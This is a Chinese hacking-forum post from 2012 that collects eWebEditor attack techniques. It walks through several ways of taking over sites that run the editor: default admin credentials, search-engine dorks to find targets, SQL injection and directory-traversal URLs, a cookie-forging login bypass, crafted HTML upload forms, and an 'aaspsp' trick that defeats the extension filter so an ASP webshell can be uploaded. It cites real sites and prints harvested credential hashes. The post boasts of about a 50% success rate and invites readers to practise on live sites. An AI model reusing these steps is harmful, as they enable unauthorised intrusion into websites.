找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2322|回复: 0
打印 上一主题 下一主题

Ewebeditor漏洞2

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 17:00:58 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
eWebEditor.asp?id=45&style=standard1 样式调用
" m+ P* n5 I& Y) U, i% w8 y# q. i* c7 C8 [2 E

- A% |$ [" M/ \  j- C$ r- ]/edit/admin_uploadfile.asp?id=14&dir=../../..2 w8 h2 U, T) V+ A5 ?. n
可以浏览网站目录  ../自己加或者减
& z% M% [' H# b/ D9 e# k0 t% |/ n! p/ f1 R# y
有次无意的入侵使我发现了ewebeditor2.7.0版本的存在注入漏洞
% U5 p: a2 ]4 Y  Q( f简单利用就是
; |: l! ?9 w; h% p* f! Shttp://site/path/ewebeditor/ewebeditor.asp?id=article_content&style=full_v200
; _( {2 h, ~! S! ~+ ?- Nhttp://www.siqinci.com/ewebedito ... amp;style=full_v200) o% H" w3 R% I" W
可以利用nbsi进行猜解,对此进行注入
2 S, `; R! o+ w. B还有的时候管理员不让复制样式,但是你又看到有个样式被别人以前入侵修改了存在asa或者之类可以传shell,但是上传插入工具没有,又无法修改怎么办那?也许很多人说应该可以加工具栏,但是我就遇见过不让加的
) @; ?- K$ x5 m; D% k# ~- m这样我们可以利用ewebeditor里的upload.asp文件进行本地构造进行上传具体如下:: S0 n' y9 K5 ~
在action下面& _% A3 @6 q$ m1 A$ S9 D
<form action="http://*********/edit/upload.asp?action=save&type=ASA&style=test" method=post name=myform enctype="multipart/form-data">0 `, q) ]$ [! q2 P4 {1 r# _# _$ C
<input type=file name=uploadfile size=1 style="width:100%" onchange="originalfile.value=this.value">
2 N; ~1 A' x2 Q- o# r" i% S<input type="submit" name="uploadfile" value="提交">: P1 ~/ p2 A% C! x1 p& e
<input type=hidden name=originalfile value="">
9 H- p  C9 H/ c/ v$ C6 i' n</form>
0 }+ r+ G: M! t& n3 Q------------------------------------------------------------------------------------------------------------------------------------------------
/ f- N1 z2 {' v<input type="submit" name="uploadfile" value="提交">    放在action后头( _/ Z0 k0 U/ h% c$ u0 L4 F
,适合用于在ewebeditor后台那个预览那里出来的 比如上传图片那里,有些时候上传页面弹不出来,就可以用upload.asp?action=save&type=ASA&style=test 这个本地来提交,不过这个东西还是要数据库里上传类型有ASA才可以传得上。
) b9 p% S# M# H6 |) p& M% m
; H) F7 m. o% r" I- }. x
4 i$ ]% @/ l+ k4 T) x
9 ]; M6 s1 \4 P8 U( w0 g! p' V- s1 v# @
Ewebeditor最新漏洞及漏洞大全[收集] (图)
! ?, X. Q- ~2 |0 E7 U3 H本帖最后由 administrator 于 2009-7-7 21:24 编辑
! R; p+ z- q8 |& d/ @' `8 g
- R4 m$ G+ P0 v+ ]0 J以下文章收集转载于网络
" N, I( Z& ^+ U#主题描述# ewebeditor 3.8漏洞[php]* R# b0 N  r" j( D3 |
--------------------------------------------------------------------------------------------
2 {/ K- x: k$ f. m; Y) O; a3 z#内容#( |6 ]. C$ {- F+ j$ E- x. ]: T" I1 D
php版ewebeditor 3.8的漏洞6 L7 L/ c" h. ^8 o' M
php版本后台是调用../ewebeditor/admin/config.php,大家去看下源码就知道,在这里我说说利用方法:
5 h% r1 E1 P- N4 q8 E. l1 首先当然要找到登陆后台,默认是../eWebEditor/admin/login.php,进入后台后随便输入一个用户和密码,当然会提示出错了,必须是出错的时候,然后这时候你清空浏览器的url,然后输入 javascript:alert(document.cookie=”adminuser=”+escape(”admin”)); javascript:alert(document.cookie=”adminpass=”+escape(”admin”)); javascript:alert(document.cookie=”admindj=”+escape(”1″));后三次回车,
" L' K8 M$ v3 ]3 M0 B& w2 然后输入正常情况才能访问的文件../ewebeditor/admin/default.php就可以进后台了: ^+ {" W9 E) b$ e) i. Z1 d% w+ \
3 后面的利用和asp一样,新增样式修改上传,就ok了* u# j/ o% X5 M+ V
测试一下asp 2.8版本的,竟然一样可以用,爽,看来asp版的应该可以通杀(只测试2.8的,貌似2.8是最高版本的)9 C& w6 n: y- Y4 y( o* X% S
aspx的版本../ewebeditor/admin/upload.aspx添好本地的cer的Shell文件,在浏揽器输入javascript:lbtnUpload.click();就能得到shell
# r  |5 [3 y' c+ w$ ?* \jsp的上传漏洞以及那个出了N久了,由于没有上传按钮,选择好要上传的shell,直接回车就可以了
+ |" o% |/ J) U5 I& @--------------------------------------------------------------------------------------------' m2 U6 Z; v; v  m* c# Z
& e( W3 R6 @/ c" i$ \2 Y

& ^6 ], h4 W7 d2 {; K) |算是比较全面的ewebeditor编辑器的漏洞收集,现在的网站大多数用的都是ewebeditor编辑器,所以ewebeditor漏洞的危害性还是相当大的,做了一下漏洞收集,漏洞修补的方法可去网上查找。5 @2 N4 i. L7 k7 t4 }3 _. V7 S- V

) p2 m/ N. M, r# i9 n* M0 U漏洞更新日期TM: 2009 2 9日 转自zake’S Blog
$ o! ?( r% |! _/ K3 z( e% @        ewebeditor最新漏洞。这个程序爆漏洞一般都是直接上传的漏洞,首先在本地搭建一个ASP环境重命名一个木马名字例如:1.gif.asp这样的就OK了
6 b1 R, k  `( S1 s& P& I* }那么接下来完美本地搭建一个环境你可以用WEB小工具搭建一个,目的就是让远程上传。/pic/3/a2009-6-4-7341a1.gif.asp搭建好了 ,在官方的地方执行网络地址7 K5 H8 B  r# K

! D1 }) M; w* z5 y, \
' N& R# z( X; A, L# f, e$ W然后确定以后,这里是最关键的一部!0 w& k2 t7 H% n; _
这里点了远程上传以后,再提交得到木马地址: B  n8 }8 \! w9 R6 C5 T& x
由于官方在图片目录做了限制 导致不能执行ASP脚本而没能拿到WEB权限
  |  O, [# E' U& o, {属于安全检测漏洞版本ewebeditor v6.0.0
) G" k2 q- l/ S, e8 x0 o% }/ m6 v7 |6 z
以前的ewebeditor漏洞:. R5 J0 C3 c1 U; L: X

7 v/ f! D- j, ~6 ]ewebeditor注入漏洞
6 P$ N3 H$ j) ?$ `3 A5 l5 r3 l# \9 l8 O
大家都知道ewebeditor编辑器默认的数据库路径db/ewebeditor.mdb
6 ~, m- t5 c+ v8 N' R+ `8 U6 B$ o默认后台地址是admin_login.asp,另外存在遍历目录漏洞,如果是asp后缀的数据库还可以写入一句话  q! ?6 e, c+ k% O+ s
今天我给大家带来的也是ewebeditor编辑器的入侵方法
3 ~2 H) v, F* i4 p4 Q' R1 \不过一种是注入,一种是利用upload.asp文件,本地构造1 v: ?: I  Q% t1 ^: E
NO1:注入
4 ^& P8 n. k8 r0 S! e& r& Yhttp://www.XXX.com/ewebeditor200 ... amp;style=full_v200
0 y$ n9 |' X; h9 E) d2 I编辑器ewebedior7以前版本通通存在注入! g+ [$ y9 j+ z/ f
直接检测不行的,要写入特征字符
- I  i* {( G  A; X我们的工具是不知道ewebeditor的表名的还有列名0 R. ~+ {( ^' k5 t% r
我们自己去看看
9 r5 ~  @" f1 {9 ]& [3 \哎。。先表吧) w- j( j/ p$ q; s. z9 n. I
要先添加进库- ^9 O0 D( x6 E, @& ?
开始猜账号密码了
, V* Y3 v) b* f我们==
% p. o3 R0 z- g: z8 I! R心急的往后拉# z" L2 ]/ j. E
出来了
1 A( |* q& {! H5 R[sys_username]:bfb18022a99849f5 chaoup[sys_userpass]:0ed08394302f7d5d 851120
. s6 _! F, a$ \! M9 b对吧^_^
2 Q2 h8 `: P/ b* x后面不说了5 o$ v& D. O$ C6 O& ^- ~; e
NO2:利用upload.asp文件,本地构造上传shell3 I6 \  X$ e$ C& K
大家看这里
) i, k$ w0 d: I/ f) P7 K: W: Phttp://www.siqinci.com/ewebedito ... lepreview&id=372 x% L" y+ G: C) n
如果遇见这样的情况又无法添加工具栏是不是很郁闷8 }9 I3 t0 b3 E& q  G4 W% ]) ?
现在不郁闷了,^_^源源不一般
4 I' `* c. Q! q4 Q  m我们记录下他的样式名“aaa”$ Z/ F  |- Y+ h" _0 `$ u
我已经吧upload.asp文件拿出来了% Q* S6 p, D6 Q# h) I* S6 Z( `
我们构造下+ P, ^- j) d5 P& U8 O6 p! \5 l. C
OK,我之前已经构造好了
9 a3 j5 N! q6 G$ {其实就是这里% g9 _5 E% g7 W5 w, u
<form action=”地址/path/upload.asp?action=save&type=&style=样式名” method=post name=myform enctype=”multipart/form-data”>+ v0 o' l7 U$ z8 J  }) s$ A
<input type=file name=uploadfile size=1 style=”width:100%”>5 F7 _; v& [, P2 P7 ]8 e% f! H
<input type=submit value=”上传了”></input>- F. ]7 e: Q0 e2 V
</form>8 l( U( R- {4 h- P+ s2 U% B7 e, _
下面我们运行他上传个大马算了  A# ]! b& W5 t3 A; D1 j
UploadFile上传进去的在这个目录下
8 x) V8 ?( B# h+ O+ R2 n6 I2008102018020762.asa, f  Z2 q. ]6 b: O0 `3 d

- J) H9 J* V  a7 I4 `4 d" U, r( B5 Y过往漏洞:
: z+ C$ K3 i* x; z7 d  p9 Q0 l$ b8 `/ D  f1 M
首先介绍编辑器的一些默认特征:. {; i: @  v- q& g/ V+ y/ k; s
默认登陆admin_login.asp% w1 J. B- P& f. ?: U" ~
默认数据库db/ewebeditor.mdb% V: v- p/ P6 V8 q: \. x7 l* d
默认帐号admin 密码admin或admin888
: o1 i# `* f/ `8 ?" f( g6 d& D搜索关键字:”inurl:ewebeditor” 关键字十分重要
9 d4 ~! S. z( g* V有人搜索”eWebEditor - eWebSoft在线编辑器”6 V7 T7 ^$ e4 q+ @2 Q5 Y3 R
根本搜索不到几个~2 s+ s( f: d! T, B
baidu.google搜索inurl:ewebeditor& ^" V8 e7 T6 V
几万的站起码有几千个是具有默认特征的~
) |' G, i* {! _1 a* A那么试一下默认后台
! b$ U7 u0 H& n6 u  z" Ahttp://www.xxx.com.cn/admin/ewebeditor/admin_login.asp. }4 J* K( B2 r" d. ]% F
试默认帐号密码登陆。
- E1 y, H5 e5 \: c/ N利用eWebEditor获得WebShell的步骤大致如下:
% U5 s# \1 _) V7 R: x1.确定网站使用了eWebEditor。一般来说,我们只要注意发表帖子(文章)的页面是否有类似做了记号的图标,就可以大致做出判断了。: g$ \' f! O; ~$ F! @# U! I; n! b9 U5 O
2.查看源代码,找到eWebEditor的路径。点击“查看源代码”,看看源码中是否存在类似“<iframe ID=’eWebEditor1′ src=’/edit/ewebeditor.asp?id=content&style=web’ frameborder=0 scrolling=no width=’550′ HEIGHT=’350′></iframe>”的语句。其实只有发现了存在这样的语句了,才可以真正确定这个网站使用了 eWebEditor。然后记下src=’***’中的“***”,这就是eWebEditor路径。
* d' s. L4 z$ K( O7 g3.访问eWebEditor的管理登录页面。eWebEditor的默认管理页面为admin_login.asp,和ewebeditor.asp在同一目录下。以上面的路径为例,我们访问的地址为:http://www.***.net/edit/admin_login.asp,看看是否出现了登录页面。
% h$ R3 Q9 \( J9 F/ G如果没有看到这样的页面,说明管理员已经删除了管理登录页面,呵呵,还等什么,走人啊,换个地方试试。不过一般来说,我很少看到有哪个管理员删了这个页面,试试默认的用户名:admin,密码:admin888。怎么样?成功了吧(不是默认账户请看后文)!1 u  t; {' c( \2 T/ z
4.增加上传文件类型。点击“样式管理”,随便选择列表中底下的某一个样式的“设置,为什么要选择列表中底下的样式?因为eWebEditor自带的样式是不允许修改的,当然你也可以拷贝一个新的样式来设置。5 O$ z' y1 _8 F
然后在上传的文件类型中增加“asa”类型。9 c  e# A2 X2 I6 W
5.上传ASP木马,获得WebShell。接下来将ASP木马的扩展名修改为asa,就可以简单上传你的ASP木马了。不要问我怎么上传啊,看到 “预览” 了吗?点击“预览”,然后选择“插入其它文件”的按钮就可以了。# z  L/ ]+ Y/ K
漏洞原理
8 `4 P, e. T7 G7 @) j3 w1 p- m& J漏洞的利用原理很简单,请看Upload.asp文件:8 y$ o( P( R. r( x; l  t
任何情况下都不允许上传asp脚本文件! x: D8 `) r; d
sAllowExt = Replace(UCase(sAllowExt), “ASP”, “”)/ }% F5 y8 C% Z
因为eWebEditor仅仅过滤了ASP文件。记得我第一次使用eWebEditor时就在纳闷:既然作者已经知道asp文件需要过滤,为什么不同时过滤asa、cer等文件呢?也许这就是对免费用户不负责任的表现吧!: v# z( e# u7 v  e* v$ u
高级应用  X1 Y& v& h8 l
eWebEditor的漏洞利用还有一些技巧:
. d6 m1 L0 g' g2 I1.使用默认用户名和密码无法登录。) T- c& S9 \! l( G3 Q. P
请试试直接下载db目录下的ewebeditor.mdb文件,用户名和密码在eWebEditor_System表中,经过了md5加密,如果无法下载或者无法破解,那就当自己的运气不好了。
3 B$ Z% e9 p, P1 F2.加了asa类型后发现还是无法上传。
% M. j& P+ B' K# i* g6 \8 ^应该是站长懂点代码,自己修改了Upload.asp文件,但是没有关系,按照常人的思维习惯,往往会直接在sAllowExt = Replace(UCase(sAllowExt), “ASP”, “”)一句上修改,我就看见过一个站长是这样修改的:
" X+ H  c$ T3 VsAllowExt = Replace(Replace(Replace(Replace(Replace(UCase(sAllowExt), “ASP”, “”), “CER”, “”), “ASA”, “”), “CDX”, “”), “HTR”, “”)
# t: w( m- [+ q. z- s) J! V猛一看什么都过滤了,但是我们只要在上传类型中增加“aaspsp”,就可以直接上传asp文件了。呵呵,是不是天才的想法?“aaspsp”过滤了 “asp”字符后,反而变成了“asp”!顺便告诉大家一个秘密,其实动网论坛7.0 sp2中也可以利用类似的方法绕过对扩展名的过滤。! ~! @  |" ^  ]
3.上传了asp文件后,却发现该目录没有运行脚本的权限。- |$ q( V7 |: N( O  t; h
呵呵,真是好笨啊,上传类型可以改,上传路径不是也可以修改的吗?仔细看看图四。
2 Z1 P+ N% I- H% ^4.已经使用了第2点中的方法,但是asp类型还是无法上传。
, ?3 M2 V* O+ l% n看来站长肯定是一个写asp的高手,但是我们还有最后一招来对付他:看到图三中的“远程类型”了吗?eWebEditor能够设定自动保存远程文件的类型,我们可以加入asp类型。但是如何才能让远程访问的asp文件能够以源码形式保存呢?方法是很多的,最简单的方法是将IIS中的“应用文件映射”中的 “asp”删除。
! p, [4 b8 N" A6 D- O2 f后记
1 ?. c# R" B. V2 A/ X根据自己的经验,几乎只要能进入eWebEditor的后台管理,基本上都可以获得WebShell。在Google上搜索 “ewebeditor.asp?id=”能够看到长达十多页的相关信息,我大致抽查了其中几个,发现成功率约为50%。还不错吧?oblg 2.52版以前的版本也是使用eWebEditor,可以去搜索几个来练练手。要命的是eWebEditor的官方网站和帮助文件中根本没有这方面的安全提示。还有,我发现官方提供的测试系统并不存在类似的漏洞,看来不是他们不知道,而是没有把免费用户的网络安危放在心上!% f5 g$ r4 ~1 k3 I
基本入侵基础漏洞
" W5 C+ c* u( u+ e5 Q/ aeWebEditor 漏洞
5 `1 }* d( }$ l5 m$ W- E
- X5 l) c# G# j各位站长在使用eWebEditor的时候是否发现,eWebEditor配置不当会使其成为网站中的隐形炸弹呢?第一次发现这漏洞源于去年的一次入侵,在山穷水尽的时候发现了eWebEditor,于是很简单就获得了WebShell。后来又有好几次利用eWebEditor进行入侵的成功经历,这才想起应该写一篇文章和大家共享一下,同时也请广大已经使用了eWebEditor的站长赶紧检查一下自己的站点。要不然,下一个被黑的就是你哦!  
0 S% E/ `  H. v4 N4 z7 r/ E: z) `; l, Q5 F+ C6 X# Q0 V; @
漏洞利用* D2 u: `& ?. n! q% N6 V5 e
利用eWebEditor获得WebShell的步骤大致如下:
$ j$ ]9 X3 E- H6 }2 j! r) l( t, D1.确定网站使用了eWebEditor。一般来说,我们只要注意发表帖子(文章)的页面是否有类似做了记号的图标,就可以大致做出判断了。
4 q: _' N- z/ T0 Z2.查看源代码,找到eWebEditor的路径。点击“查看源代码”,看看源码中是否存在类似“<iframe ID='eWebEditor1' src='/edit/ewebeditor.asp?id=content&style=web' frameborder=0 scrolling=no width='550' HEIGHT='350'></iframe>”的语句。其实只有发现了存在这样的语句了,才可以真正确定这个网站使用了 eWebEditor。然后记下src='***'中的“***”,这就是eWebEditor路径。* B5 {) ^5 ^1 _/ l
3.访问eWebEditor的管理登录页面。eWebEditor的默认管理页面为admin_login.asp,和ewebeditor.asp在同一目录下。以上面的路径为例,我们访问的地址为:http://www.***.net/edit/admin_login.asp,看看是否出现了登录页面。% L- T' s  u: T# g3 c
如果没有看到这样的页面,说明管理员已经删除了管理登录页面,呵呵,还等什么,走人啊,换个地方试试。不过一般来说,我很少看到有哪个管理员删了这个页面,试试默认的用户名:admin,密码:admin888。怎么样?成功了吧(不是默认账户请看后文)!5 q2 l  e& v: `# K% D
4.增加上传文件类型。点击“样式管理”,随便选择列表中底下的某一个样式的“设置,为什么要选择列表中底下的样式?因为eWebEditor自带的样式是不允许修改的,当然你也可以拷贝一个新的样式来设置。
6 l5 x5 f5 i6 W2 A" u4 I0 r4 I; I. e& H* m  B3 x
然后在上传的文件类型中增加“asa”类型。4 @# u9 E: Y) l. I5 X
1 T2 {" f+ l" ~) m. C! h9 V! s# r
5.上传ASP木马,获得WebShell。接下来将ASP木马的扩展名修改为asa,就可以简单上传你的ASP木马了。不要问我怎么上传啊,看到 “预览” 了吗?点击“预览”,然后选择“插入其它文件”的按钮就可以了。
' Q0 B( A8 w" ?7 I; y, a9 M/ T' L$ p2 N9 ?7 ]! Q
+ w; q4 c# p+ r3 t# f- ]+ D5 g
漏洞原理' B* L$ N3 {4 E0 s+ h) f" W
漏洞的利用原理很简单,请看Upload.asp文件:3 f9 q3 O& O- J0 f5 K) c" R
任何情况下都不允许上传asp脚本文件
$ q7 H- n& q' ]. y7 _3 csAllowExt = replace(UCase(sAllowExt), "ASP", "")* _: w  m/ I$ t5 m  U
因为eWebEditor仅仅过滤了ASP文件。记得我第一次使用eWebEditor时就在纳闷:既然作者已经知道asp文件需要过滤,为什么不同时过滤asa、cer等文件呢?也许这就是对免费用户不负责任的表现吧!
( j$ d2 D, P4 ^7 H9 d. z$ V4 v- z4 F3 b& o
高级应用  _( j9 M  A" L# C, p
eWebEditor的漏洞利用还有一些技巧:. |& q* `: T6 \# d2 ?
1.使用默认用户名和密码无法登录。
- _8 d, v6 N+ j请试试直接下载db目录下的ewebeditor.mdb文件,用户名和密码在eWebEditor_System表中,经过了md5加密,如果无法下载或者无法****,那就当自己的运气不好了。
1 T, Q! Q  n8 g2 B2.加了asa类型后发现还是无法上传。0 q3 `# z2 |1 P- Y
应该是站长懂点代码,自己修改了Upload.asp文件,但是没有关系,按照常人的思维习惯,往往会直接在sAllowExt = replace(UCase(sAllowExt), "ASP", "")一句上修改,我就看见过一个站长是这样修改的:
# v. @4 U; }( M4 h, ^$ e! bsAllowExt = replace(replace(replace(replace(replace(UCase(sAllowExt), "ASP", ""), "CER", ""), "ASA", ""), "CDX", ""), "HTR", "")
- z; i, F( O" x猛一看什么都过滤了,但是我们只要在上传类型中增加“aaspsp”,就可以直接上传asp文件了。呵呵,是不是天才的想法?“aaspsp”过滤了 “asp”字符后,反而变成了“asp”!顺便告诉大家一个秘密,其实动网论坛7.0 sp2中也可以利用类似的方法绕过对扩展名的过滤。
# @0 A+ o+ i& }% s" t3.上传了asp文件后,却发现该目录没有运行脚本的权限。5 X/ s+ Z) |" Y9 y
呵呵,真是好笨啊,上传类型可以改,上传路径不是也可以修改的吗?仔细看看图四。7 K+ d2 p; |- J/ j# h; P
4.已经使用了第2点中的方法,但是asp类型还是无法上传。+ n# t( G7 R1 N; ]2 }
看来站长肯定是一个写asp的高手,但是我们还有最后一招来对付他:看到图三中的“远程类型”了吗?eWebEditor能够设定自动保存远程文件的类型,我们可以加入asp类型。但是如何才能让远程访问的asp文件能够以源码形式保存呢?方法是很多的,最简单的方法是将IIS中的“应用文件映射”中的 “asp”删除。. W4 N0 Y: i, a8 f( o9 O+ P# j

# e2 p4 C- B  G- a后记/ s0 e& `- _) E$ i( O( ~! q! A
根据自己的经验,几乎只要能进入eWebEditor的后台管理,基本上都可以获得WebShell。在Google上搜索 “ewebeditor.asp?id=”能够看到长达十多页的相关信息,我大致抽查了其中几个,发现成功率约为50%。还不错吧?oblg 2.52版以前的版本也是使用eWebEditor,可以去搜索几个来练练手。要命的是eWebEditor的官方网站和帮助文件中根本没有这方面的安全提示。还有,我发现官方提供的测试系统并不存在类似的漏洞,看来不是他们不知道,而是没有把免费用户的网络安危放在心上!
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表